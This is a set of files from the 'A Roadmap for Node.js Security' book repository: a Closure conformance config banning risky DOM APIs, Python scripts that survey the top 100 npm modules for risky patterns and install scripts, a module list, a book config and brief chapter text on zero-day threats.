 44 |   rule_id: 'closure:windowStringFunctionDefinition'
 45 |   type: RESTRICTED_METHOD_CALL
 46 | 
 47 |   value: 'Window.prototype.setTimeout:function(string, ...?)'
 48 |   value: 'Window.prototype.setImmediate:function(string, ...?)'
 49 |   value: 'Window.prototype.setInterval:function(string, ...?)'
 50 |   value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'
 51 | 
 52 |   error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
 53 | }
 54 | 
 55 | requirement: {
 56 |   type: BANNED_PROPERTY
 57 |   error_message: 'Arguments.prototype.callee'
 58 | 
 59 |   value: 'Arguments.prototype.callee'
 60 | 
 61 |   whitelist: 'javascript/closure/base.js'  # goog.base uses arguments.callee
 62 |   whitelist: 'javascript/closure/debug/'  # legacy stack trace support, etc
 63 | }
 64 | 
 65 | requirement: {
 66 |   type: BANNED_PROPERTY_WRITE
 67 |   error_message: 'Assignment to Element.prototype.innerHTML is not allowed'
 68 | 
 69 |   value: 'Object.innerHTML'
 70 | 
 71 |   # Safe wrapper for this property.
 72 |   whitelist: 'javascript/closure/dom/safe.js'
 73 | 
 74 |   # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
 75 |   # innerHTML is a single HTML entity.
 76 |   whitelist: 'javascript/closure/string/string.js'
 77 | }
 78 | 
 79 | requirement: {
 80 |   type: BANNED_PROPERTY_WRITE
 81 |   error_message: 'Assignment to Element.prototype.outerHTML is not allowed'
 82 | 
 83 |   value: 'Object.outerHTML'
 84 | 
 85 |   # Safe wrapper for this property.
 86 |   whitelist: 'javascript/closure/dom/safe.js'
 87 | }
 88 | 
 89 | requirement: {
 90 |   type: BANNED_PROPERTY_WRITE
 91 |   error_message: 'Assignment to Location.prototype.href is not allowed'
 92 | 
 93 |   value: 'Location.prototype.href'
 94 | 
 95 |   # Safe wrapper for this property.
 96 |   whitelist: 'javascript/closure/dom/safe.js'
 97 | }
 98 | 
 99 | requirement: {
100 |   type: BANNED_PROPERTY_WRITE
101 |   error_message: 'Assignment to location is not allowed'
102 | 
103 |   value: 'Window.prototype.location'
104 | }
105 | 
106 | requirement: {
107 |   type: BANNED_PROPERTY_WRITE
108 |   error_message: 'Assignment to .href property or src'
109 | 
110 |   # Types with .href properties that do not extend from Element.
111 | #  value: 'StyleSheet.prototype.href'
112 | #  value: 'CSSImportRule.prototype.href'
113 | 
114 |   # All other types extend from Element.
115 | #  value: 'Element.prototype.href'
116 |   value: 'Object.href'
117 |   value: 'Object.src'
118 | 
119 |   # Safe wrapper for this property.
120 |   whitelist: 'javascript/closure/dom/safe.js'
121 | }
122 | 
123 | requirement: {
124 |   rule_id: 'setAttribute URL'
125 |   type: BANNED_CODE_PATTERN
126 |   error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
127 |   value:
128 |       '/**\n'
129 |       ' * @param {*} element\n'
130 |       ' * @param {?} value\n'
131 |       ' */\n'
132 |       'function template(element, value) {'
133 |       '  element.setAttribute(\'src\', value);'
134 |       '}'
135 |   value:
136 |       '/**\n'
137 |       ' * @param {*} element\n'
138 |       ' * @param {?} value\n'
139 |       ' */\n'
140 |       'function template(element, value) {\n'
141 |       '  element.setAttribute(\'href\', value);\n'
142 |       '}'
143 | }
144 | 
145 | requirement: {
146 |   type: BANNED_PROPERTY_WRITE
147 |   error_message: 'Use of document.domain is not allowed'
148 | 
149 |   value: 'Document.prototype.domain'
150 | }
151 | 


--------------------------------------------------------------------------------
/appendix/jsconf/experiment.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | """
  4 | Runs JSConformance on each of the top 100 modules and collates the results.
  5 | """
  6 | 
  7 | # Copyright 2017 Google LLC
  8 | #
  9 | # Licensed under the Apache License, Version 2.0 (the "License");
 10 | # you may not use this file except in compliance with the License.
 11 | # You may obtain a copy of the License at
 12 | #
 13 | #     https://www.apache.org/licenses/LICENSE-2.0
 14 | #
 15 | # Unless required by applicable law or agreed to in writing, software
 16 | # distributed under the License is distributed on an "AS IS" BASIS,
 17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 18 | # See the License for the specific language governing permissions and
 19 | # limitations under the License.
 20 | 
 21 | import json
 22 | import os.path
 23 | import py_common.npm
 24 | import re
 25 | import shutil
 26 | import subprocess
 27 | import sys
 28 | 
 29 | 
 30 | _error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
 31 | # Patterns that can be used to group error messages by glossing over
 32 | # any content not in a capturing group.
 33 | _simplifier_res = (
 34 |     re.compile(r'^(required ").*?(" namespace not provided yet)'),
 35 |     re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
 36 |     re.compile(r'^(Illegal redeclared variable: ).*'),
 37 |     re.compile(r'^(Parse error[.]).*'),
 38 | )
 39 | 
 40 | 
 41 | def run_jsconf(node_modules, module_name, externs):
 42 |     """
 43 |     Runs JSConformance on the given module's source files.
 44 |     """
 45 |     srcs = py_common.npm.js_srcs_almost_worst_case(
 46 |         node_modules, module_name,
 47 |         module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
 48 |     if not srcs:
 49 |         raise Exception(module_name + ' has no srcs')
 50 |     args = [
 51 |         'java',
 52 |         '-jar',
 53 |         os.path.join(
 54 |             os.path.dirname(node_modules),
 55 |             'tools',
 56 |             'closure-compiler-latest',
 57 |             'closure-compiler.jar'),
 58 |         '--process_common_js_modules',
 59 |         '--checks-only',
 60 |         '--third_party=true',
 61 |         '--module_resolution=NODE',
 62 |         '--js_module_root=%s' % os.path.realpath(node_modules),
 63 |         '--jscomp_error=conformanceViolations',
 64 |         '--conformance_configs',
 65 |         os.path.join(
 66 |             os.path.dirname(node_modules),
 67 |             'jsconf',
 68 |             'conformance_proto.textproto'),
 69 |     ]
 70 |     for (_, js_file) in srcs:
 71 |         args += ['--js', os.path.realpath(js_file)]
 72 |     for js_file in sorted(externs):
 73 |         args += ['--externs', js_file]
 74 |     #print >>sys.stderr, len(' '.join(args))
 75 |     if len(' '.join(args)) >= 240000:  # `getconf ARG_MAX` for Mac OSX
 76 |         return ['Argument list too long']
 77 |     process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
 78 |     content = process.stdout.read()
 79 |     retcode = process.wait()
 80 |     violations = []
 81 |     if retcode == 0:
 82 |         violations.append('Passed')
 83 |     for match in _error_re.finditer(content):
 84 |         violation = match.group(1)
 85 |         for simpler in _simplifier_res:
 86 |             match = simpler.match(violation)
 87 |             if match:
 88 |                 violation = '...'.join(match.groups())
 89 |         violations.append(violation)
 90 |     return violations
 91 | 
 92 | if __name__ == '__main__':
 93 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
 94 | 
 95 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
 96 | 
 97 |     externs = set()
 98 |     for externs_file in py_common.npm.js_files_under(
 99 |             os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
100 |         if os.path.basename(os.path.dirname(externs_file)) == 'tests':
101 |             continue
102 |         externs.add(externs_file)
103 | 
104 |     # Maps rule identifiers to sets of offending modules.
105 |     rule_violations = {}
106 | 
107 | 
108 |     module_count = 0
109 |     for module_name in top100:
110 |         violations = run_jsconf(node_modules, module_name, externs)
111 |         if ('Parse error.' in violations
112 |             or 'Argument list too long' in violations):
113 |             pass
114 |         else:
115 |             module_count += 1
116 |         for v in violations:
117 |             if v in rule_violations:
118 |                 vmap = rule_violations[v]
119 |             else:
120 |                 vmap = rule_violations[v] = {}
121 |             vmap[module_name] = vmap.get(module_name, 0) + 1
122 | 
123 |     # TODO: exclude Parse error and Argument list too long
124 | 
125 |     print "## JS Conformance {#jsconf}"
126 |     print ""
127 |     print "JS Conformance identifies uses of risky APIs."
128 |     print ""
129 |     print "Some modules did not parse.  This may be dues to typescript."
130 |     print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript"
131 |     print "inputs."
132 |     print ""
133 |     print "If a module is both in the top 100 and is a dependency of another"
134 |     print "module in the top 100, then it will be multiply counted."
135 |     print ""
136 |     print "Out of %d modules that parsed" % module_count
137 |     print ""
138 |     print "| Violation | Count of Modules | Total Count | Quartiles |"
139 |     print "| --------- | ---------------- | ----------- | --------- |"
140 |     for (v, vmap) in sorted(rule_violations.items()):
141 |         count = 0
142 |         total_count = 0
143 |         values = vmap.values()
144 |         for n in values:
145 |             count += 1
146 |             total_count += n
147 |         values += [0] * (module_count - count)
148 |         values.sort()
149 |         quartiles = '%d / %d / %d' % (
150 |             values[len(values) >> 2],
151 |             values[len(values) >> 1],
152 |             values[(len(values) * 3) >> 2],
153 |         )
154 |         print "| `%s` | %d | %d | %s |" % (
155 |             v, count, total_count, quartiles)
156 | 


--------------------------------------------------------------------------------
/appendix/lazy-load/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for lazy loading patterns.
18 | 
19 | Patterns to identify include
20 | 
21 |   * { ... require(...)
22 | 
23 | """
24 | 
25 | import json
26 | import os.path
27 | import py_common.npm
28 | import re
29 | import shutil
30 | import sys
31 | 
32 | 
# Heuristic for a `require(` call nested inside a block: an opening "{", any
# run of characters other than "}", then a bare `require` (not preceded by an
# identifier character, "$" or ".") followed by "(".
lazy_load_pattern = re.compile(
    r'[{][^}]*(?<![_$\w.])require\s*\(')

def find_lazy_load(node_modules, module_name):
    """
    Returns the sources reachable from module_name whose preprocessed
    content matches lazy_load_pattern, ignoring dependencies on tools
    that can run before deployment.
    """
    skip_early_tools = py_common.npm.ignore_tools_that_can_run_early(
        module_name)
    return py_common.npm.js_srcs_matching(
        node_modules=node_modules,
        module_name=module_name,
        pattern=lazy_load_pattern,
        module_filter=skip_early_tools)
40 | 
41 | 
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100.txt>
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # One module name per line; blank lines are ignored.  The handle is
    # closed explicitly instead of being left to the garbage collector.
    with open(top100_txt) as top100_file:
        top100 = [x for x in top100_file.read().split('\n') if x]

    uses = 0         # modules with at least one matching source file
    total_count = 0  # modules examined
    has_lazy_load = {}  # module name -> matching (module, path) sources
    for module_name in top100:
        js_srcs = find_lazy_load(node_modules, module_name)
        has_lazy_load[module_name] = js_srcs
        if js_srcs:
            uses += 1
        total_count += 1

    print (
"""
## Lazy loads {#lazy_load}

Lazy loading can complicate code bundling if care is not taken.

%d of %d = %1.02f%% contain a use of require inside a `{...}` block.
""" % (uses, total_count, (100.0 * uses) / total_count))
65 | 


--------------------------------------------------------------------------------
/appendix/py_common/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/appendix/py_common/npm.py:
--------------------------------------------------------------------------------
  1 | """
  2 | Utilities for mucking with NPM packages
  3 | """
  4 | 
  5 | # Copyright 2017 Google LLC
  6 | #
  7 | # Licensed under the Apache License, Version 2.0 (the "License");
  8 | # you may not use this file except in compliance with the License.
  9 | # You may obtain a copy of the License at
 10 | #
 11 | #     https://www.apache.org/licenses/LICENSE-2.0
 12 | #
 13 | # Unless required by applicable law or agreed to in writing, software
 14 | # distributed under the License is distributed on an "AS IS" BASIS,
 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 16 | # See the License for the specific language governing permissions and
 17 | # limitations under the License.
 18 | 
 19 | import json
 20 | import os
 21 | import os.path
 22 | import re
 23 | import subprocess
 24 | import sys
 25 | import tempfile
 26 | 
 27 | import jslex.jslex
 28 | 
 29 | def install_packages(*package):
 30 |     """
 31 |     Creates a temporary node_modules directory with the given packages
 32 |     and returns it.
 33 |     """
 34 |     tmp_dir = tempfile.mkdtemp()
 35 |     tmp_node_modules_dir = os.path.join(tmp_dir, 'node_modules')
 36 |     os.mkdir(tmp_node_modules_dir)
 37 |     subprocess.check_call([
 38 |         'npm', 'install', '--ignore-scripts', '--only=prod',
 39 |         '-g', '--prefix', tmp_node_modules_dir,
 40 |         '--'] + list(package))
 41 |     return tmp_node_modules_dir
 42 | 
 43 | 
 44 | def for_each_npm_package(node_modules_dir, f):
 45 |     """
 46 |     Calls f with each package directory path.
 47 | 
 48 |     Returns an object with the result of each call keyed by
 49 |     package name.
 50 | 
 51 |     For a dir tree like
 52 |        node_modules
 53 |          foo
 54 |            package.json
 55 |            ...
 56 |          bar
 57 |            package.json
 58 |            ...
 59 |          baz
 60 |            package.json
 61 |            ...
 62 |          .bin
 63 |            ...
 64 |     returns
 65 |         {
 66 |           'bar': f('node_modules/bar'),
 67 |           'baz': f('node_modules/baz'),
 68 |           'foo': f('node_modules/foo')
 69 |         }
 70 |     """
 71 |     result = {}
 72 |     for fname in os.listdir(node_modules_dir):
 73 |         if fname not in ('.', '..'):
 74 |             if os.path.isfile(os.path.join(node_modules_dir, fname, 'package.json')):
 75 |                 result[fname] = f(os.path.join(node_modules_dir, fname))
 76 |     return result
 77 | 
 78 | def ignore_tools_that_can_run_early(module_name):
 79 |     """
 80 |     A module filter that filters out dependencies on modules that
 81 |     can be run during the bundling/validation process so are not strictly
 82 |     necessary at runtime.
 83 |     """
 84 |     return lambda mn: mn == module_name or not (
 85 |         mn.startswith('babel')
 86 |         or mn.startswith('eslint'))
 87 | 
# Matches a call to a bare `require` (one not preceded by a word character
# or "."); group 1 captures the raw text between "(" and the first ")".
_REQUIRE_RE = re.compile(r'(?<![\w.])require\s*[(]([^\)]*)')
# Matches module specifiers that start with "./" or "../".
_REL_REQUIRE_RE = re.compile(r'^[.][.]?/')
 90 | 
 91 | def js_srcs_almost_worst_case(node_modules, module_name, module_filter=None):
 92 |     """
 93 |     The set of JS & TS source files required by a module
 94 |     including those required by prod dependencies.
 95 | 
 96 |     This does not take into account TS imports.
 97 | 
 98 |     This is not entirely conservative.
 99 |     We make an optimistic assumption that a dynamic load,
100 |     a require(x) where x is not a string literal, only
101 |     loads files from the same module.
102 |     This is not true, e.g. when bazel-core loads extension
103 |     modules.
104 |     These cross-module loads need not only load from prod
105 |     dependencies, so assuming otherwise would not actually
106 |     make us conservative either.
107 | 
108 |     Returns [('module', '/abs/path/to/src.js'), ...]
109 |     """
110 |     if module_filter is None:
111 |         module_filter = lambda _: True
112 |     js_files = set()
113 |     unprocessed = [module_name]
114 |     visited = set()
115 |     while unprocessed:
116 |         up_module_name = unprocessed.pop()
117 |         if up_module_name in visited: continue
118 |         visited.add(up_module_name)
119 |         if not module_filter(up_module_name): continue
120 |         rq = None
121 |         try:
122 |             rq = requires(node_modules, module_name)
123 |         except:
124 |             import traceback
125 |             traceback.print_exc()
126 |         if rq is not None and rq['upper']:
127 |             js_files.update([(up_module_name, src) for src in rq['srcs']])
128 |             unprocessed += rq['deps']
129 |         else:
130 |             #print >>sys.stderr, "Falling back to worst-case for %s required by %s" % (
131 |             #    up_module_name, module_name)
132 |             js_files.update([(up_module_name, src) for src in
133 |                              js_files_under(
134 |                                  os.path.join(node_modules, up_module_name))
135 |                              if not probable_non_prod_file(src)])
136 |             package_json = None
137 |             try:
138 |                 package_json = json.loads(
139 |                     file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
140 |                     .read())
141 |             except:
142 |                 print >>sys.stderr, "Undeclared dependency %s" % up_module_name
143 |             if package_json is not None:
144 |                 unprocessed += package_json['dependencies'].keys()
145 |     return tuple(sorted(js_files))
146 | 
def requires(node_modules, module_name):
    """
    Follows require() calls to bound the set of JS files in a module.

    Starts from the "main" entry of the module's package.json and follows
    string-literal relative requires ("./x", "../x") to other files,
    resolving each against the directory of the file that contains the
    call.  Non-relative string-literal requires are recorded as deps.

    Returns {
      'srcs': [...],  # main.js and same-module files required thereof
      'deps': [...],  # required modules
      'upper': True,  # True when srcs and deps accounts for all require calls.
    }

    'upper' is False when package.json has no "main", when a file cannot
    be read, or when a require argument is not a decodable string literal.

    Raises if the module's package.json cannot be read or parsed.
    """
    module_root = os.path.join(node_modules, module_name)
    with open(os.path.join(module_root, 'package.json')) as package_file:
        package_json = json.loads(package_file.read())
    main_files = package_json.get('main', None)
    # Accept both byte and text strings so this works on Python 2 and 3.
    if isinstance(main_files, (type(''), type(u''))):
        main_files = (main_files,)
    if not main_files:
        return { 'srcs': (), 'deps': (), 'upper': False }
    srcs = set()
    deps = set()
    upper = True
    visited = set()
    unprocessed = [os.path.join(module_root, rp) for rp in main_files]
    while unprocessed:
        src = os.path.realpath(unprocessed.pop())
        if src in visited:
            continue
        visited.add(src)
        if os.path.isdir(src):
            # A directory stands for every JS/TS file beneath it.
            unprocessed.extend(js_files_under(src))
            continue
        srcs.add(src)
        content = ''
        try:
            with open(src, 'r') as src_file:
                content = src_file.read()
        except Exception:
            # Unreadable (e.g. missing) file: the bound is no longer sound.
            upper = False
        for match in _REQUIRE_RE.finditer(content):
            arg = match.group(1).strip()
            if not arg:
                continue  # Zero arguments
            is_quoted = (
                len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1])
            if not is_quoted:
                # Dynamic require, or anything that is not a lone literal.
                upper = False
                continue
            try:
                arg = json.loads('"%s"' % arg[1:-1])
            except Exception:
                # Not decodable as a literal; do not record the raw quoted
                # text as if it were a module name.
                upper = False
                continue
            if _REL_REQUIRE_RE.match(arg):
                if not arg.endswith('.js'):
                    arg += '.js'
                # Relative specifiers are relative to the requiring file,
                # not to the current working directory.
                unprocessed.append(os.path.join(os.path.dirname(src), arg))
            else:
                deps.add(arg)
    return {
        'srcs': tuple(sorted(srcs)),
        'deps': tuple(sorted(deps)),
        'upper': upper
    }
206 | 
def js_files_under(root_dir):
    """
    Lazily yields the path of every file under root_dir, at any depth,
    whose name ends in '.js' or '.ts'.
    """
    for (parent, _, names) in os.walk(root_dir):
        for name in names:
            if name.endswith(('.js', '.ts')):
                yield os.path.join(parent, name)
212 | 
def preprocess_js_content(content):
    """
    Canonicalizes JS source text so that patterns are easier to apply.

    The content is lexed; each comment token is replaced by a single
    space and each string or regex token is upper-cased, so lower-case
    keywords and identifiers cannot be confused with similar text
    inside a literal.  All other tokens pass through unchanged.

    Returns the re-joined token text.
    """
    def canonicalize(kind, text):
        if kind in ('comment', 'linecomment'):
            return ' '
        if kind in ('regex', 'string'):
            return text.upper()
        return text

    tokens = jslex.jslex.JsLexer().lex(content)
    return ''.join(canonicalize(kind, text) for (kind, text) in tokens)
234 | 
def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
    """
    A list of the sources of module_name, and of the modules it depends
    on, whose preprocessed content matches pattern.

    node_modules -- path to the node_modules directory.
    module_name -- the module whose sources should be searched.
    pattern -- compiled regular expression; applied with search() to the
        output of preprocess_js_content.
    module_filter -- passed through to js_srcs_almost_worst_case.

    Returns a list of ('module', 'path/to/src.js') pairs.
    """

    srcs = js_srcs_almost_worst_case(
        node_modules=node_modules,
        module_name=module_name,
        module_filter=module_filter)

    matching_srcs = []
    for src in srcs:
        (_, path) = src
        # Close each source promptly; a module can have very many files.
        with open(path, 'r') as src_file:
            canon_content = preprocess_js_content(src_file.read())
        if pattern.search(canon_content):
            matching_srcs.append(src)
    return matching_srcs
254 | 
# by visual examination of
# `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
# Matches a whole path segment (case-insensitively) that names a directory
# of tests, demos, examples, benchmarks or GitHub metadata.  The dot in
# ".github" is written as [.] so that it only matches a literal dot.
_NON_PROD_PATH = re.compile(
    r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|[.]github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
def probable_non_prod_file(path):
    """
    True when path has a segment that marks it as probably not prod code,
    so it can be skipped when falling back to directory scanning.
    """
    return _NON_PROD_PATH.search(path) is not None
264 | 


--------------------------------------------------------------------------------
/appendix/test-code/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for test code patterns under node_modules.
18 | 
19 | Patterns identify include
20 | 
21 |   * require('assert')
22 |   * require('chai')
23 |   * require('chai/*')
24 |   * require('mocha')
25 |   * require('should')
26 |   * require('unexpected')
27 | 
28 | """
29 | 
30 | import json
31 | import os.path
32 | import py_common.npm
33 | import re
34 | import shutil
35 | import sys
36 | 
37 | 
# Matches a bare require(...) of one of the listed test libraries given as
# a quoted string literal.  `chai/[^\'\"]+` accepts any non-empty sub-path
# of chai, e.g. require('chai/register-expect').
test_code_pattern = re.compile(
    r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]+|mocha|should|unexpected)[\'\"]')
40 | 
41 | 
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100.txt>
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # One module name per line; blank lines are ignored.
    with open(top100_txt) as top100_file:
        top100 = [x for x in top100_file.read().split('\n') if x]

    uses = 0         # modules with at least one file matching the pattern
    total_count = 0  # modules examined
    has_test_code = {}  # NOTE: never populated below
    for module_name in top100:
        module_root = os.path.join(separate_modules, module_name)
        for js_file in py_common.npm.js_files_under(module_root):
            # Close each file as soon as it is read; a module tree can
            # contain far more files than the open-file limit.
            with open(js_file, 'r') as js_handle:
                js_content = js_handle.read()
            if test_code_pattern.search(js_content):
                uses += 1
                break  # one hit is enough to count the module
        total_count += 1

    print (
"""
## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures which modules, when installed `--only=prod` include
test patterns.

%d of %d = %1.02f%% contain test code patterns
""" % (uses, total_count, (100.0 * uses) / total_count))
69 | 


--------------------------------------------------------------------------------
/appendix/top100.txt:
--------------------------------------------------------------------------------
  1 | async
  2 | babel-core
  3 | babel-preset-es2015
  4 | babel-runtime
  5 | bluebird
  6 | body-parser
  7 | chalk
  8 | cheerio
  9 | classnames
 10 | coffee-script
 11 | colors
 12 | commander
 13 | debug
 14 | express
 15 | fs-extra
 16 | glob
 17 | gulp
 18 | gulp-util
 19 | jquery
 20 | lodash
 21 | minimist
 22 | mkdirp
 23 | moment
 24 | prop-types
 25 | q
 26 | react
 27 | react-dom
 28 | request
 29 | rxjs
 30 | through2
 31 | underscore
 32 | uuid
 33 | webpack
 34 | winston
 35 | yargs
 36 | yeoman-generator
 37 | @angular/common
 38 | @angular/core
 39 | aws-sdk
 40 | axios
 41 | babel-loader
 42 | babel-polyfill
 43 | chai
 44 | co
 45 | core-js
 46 | css-loader
 47 | ejs
 48 | ember-cli-babel
 49 | eslint
 50 | handlebars
 51 | inquirer
 52 | joi
 53 | js-yaml
 54 | mocha
 55 | mongodb
 56 | mongoose
 57 | node-uuid
 58 | object-assign
 59 | optimist
 60 | ramda
 61 | react-redux
 62 | redis
 63 | redux
 64 | request-promise
 65 | rimraf
 66 | semver
 67 | shelljs
 68 | socket.io
 69 | superagent
 70 | xml2js
 71 | yosay
 72 | zone.js
 73 | @angular/compiler
 74 | @angular/forms
 75 | @angular/http
 76 | @angular/platform-browser
 77 | @angular/platform-browser-dynamic
 78 | @types/node
 79 | angular
 80 | autoprefixer
 81 | babel-eslint
 82 | babel-preset-react
 83 | bootstrap
 84 | cookie-parser
 85 | dotenv
 86 | es6-promise
 87 | eslint-plugin-react
 88 | extend
 89 | extract-text-webpack-plugin
 90 | file-loader
 91 | immutable
 92 | jade
 93 | jsonwebtoken
 94 | marked
 95 | mime
 96 | morgan
 97 | mysql
 98 | nan
 99 | node-sass
100 | path
101 | promise
102 | react-router
103 | style-loader
104 | typescript
105 | uglify-js
106 | underscore.string
107 | vue
108 | ws
109 | 


--------------------------------------------------------------------------------
/appendix/uses-scripts/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Collates how many projects use install scripts.
18 | 
19 | Per https://docs.npmjs.com/misc/scripts we look for the
20 | following keys under "scripts" in package.json:
21 | 
22 |   * preinstall
23 |   * install
24 |   * postinstall
25 | """
26 | 
27 | import json
28 | import os.path
29 | import py_common.npm
30 | import sys
31 | 
def uses_scripts(package_root):
    """
    True when the package.json directly under package_root declares a
    preinstall, install or postinstall entry under "scripts".

    Raises if package.json cannot be read or parsed.
    """
    # Read via a context manager so the handle is closed deterministically.
    with open(os.path.join(package_root, 'package.json')) as package_file:
        package_json = json.loads(package_file.read())
    scripts_obj = package_json.get('scripts', None)
    if scripts_obj is None:
        return False
    # TODO: True if empty value
    return any(
        script_type in scripts_obj
        for script_type in ('preinstall', 'install', 'postinstall'))
42 | 
if __name__ == '__main__':
    # Usage: experiment.py <node_modules> <separate_modules> <top100.txt>
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    # Maps each package directly under node_modules to whether it declares
    # an installation script.
    per_package = py_common.npm.for_each_npm_package(
        node_modules, uses_scripts)
    total_count = len(per_package)
    # Kept under its own name so the uses_scripts function is not rebound.
    script_user_count = sum(1 for uses in per_package.values() if uses)
    print (
"""
## Uses Scripts {#uses_scripts}

Unless steps are taken, installation scripts run code on
a developer's workstation when they have write access to
local repositories.  If this number is small, having
humans check installation scripts before running might
be feasible.

%d of %d = %1.02f%% use installation scripts
""" % (script_user_count, total_count,
       (100.0 * script_user_count) / total_count))
66 | 


--------------------------------------------------------------------------------
/book.json.withcomments:
--------------------------------------------------------------------------------
 1 | # Comments are stripped
 2 | {
 3 |     "root": ".",
 4 |     "structure": {
 5 |         "readme": "cover.md"
 6 |     },
 7 |     "title": "A Roadmap for Node.js Security",
 8 |     "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them.  Assumes a basic familiarity with JS & the Node ecosystem.",
 9 |     "author": "Mike Samuel et al",
10 |     "language": "en",
11 |     "gitbook": ">= 3.0.0",
12 |     "plugins": [
13 |         "links",
14 |         "ga"
15 |     ],
16 |     "pluginsConfig": {
17 |         # Google Analytics integration
18 |         "ga": {
19 |             "token": "UA-111883728-1",
20 |             "configuration": {
21 |                 "anonymizeIp": true,
22 |                 "forceSSL": true
23 |             }
24 |         },
25 |         "links": {
26 |             "links": [
27 |                 {
28 |                     # Adds a printer icon at the top.
29 |                     # See styles/website.css for styling.
30 |                     "label": "Printable",
31 |                     # "icon" corresponds to a classname
32 |                     "icon": "print-button",
33 |                     # `make pdf` produces book.json which
34 |                     # needs to be copied into _book/ for
35 |                     # this to work.
36 |                     # TODO: Point to an authoritative version
37 |                     # via absolute URL once published.
38 |                     "url": "/node-sec-roadmap.pdf"
39 |                 },
40 |                 {
41 |                     "label": "Github",
42 |                     "icon": "github-button",
43 |                     "url": "https://github.com/google/node-sec-roadmap"
44 |                 }
45 |             ]
46 |         }
47 |     }
48 | }
49 | 


--------------------------------------------------------------------------------
/chapter-1/recap.md:
--------------------------------------------------------------------------------
 1 | We've discussed the kinds of threats that concern us.
 2 | 
 3 | Next we discuss how some Node.js projects mitigate these threats today
 4 | and how we can make it easier for more Node.js projects to
 5 | consistently mitigate these threats.
 6 | 
 7 | Readers may find it useful to refer back to the [threat table][] which
 8 | cross-indexes threats and mitigation strategies.
 9 | 
10 | [threat table]: threats.md#threat_table
11 | 


--------------------------------------------------------------------------------
/chapter-1/threat-0DY.md:
--------------------------------------------------------------------------------
 1 | # Zero Day
 2 | 
 3 | When a researcher discloses a new security vulnerability, the clock
 4 | starts ticking.  An attacker can compromise a product if they can
 5 | weaponize the disclosure before the product team
 6 | 
 7 | *  realizes they're vulnerable, and
 8 | *  finds a patch to the vulnerable dependency, or rolls their own, and
 9 | *  tests the patched release and pushes it into production.
10 | 
11 | ["The Best Defenses Against Zero-day Exploits for Various-sized
12 | Organizations"][sans] notes
13 | 
14 | > Zero-day exploits are vulnerabilities that have yet to be publicly
15 | > disclosed. These exploits are usually the most difficult to defend
16 | > against because data is generally only available for analysis after
17 | > the attack has completed its course.
18 | 
19 | > ...
20 | 
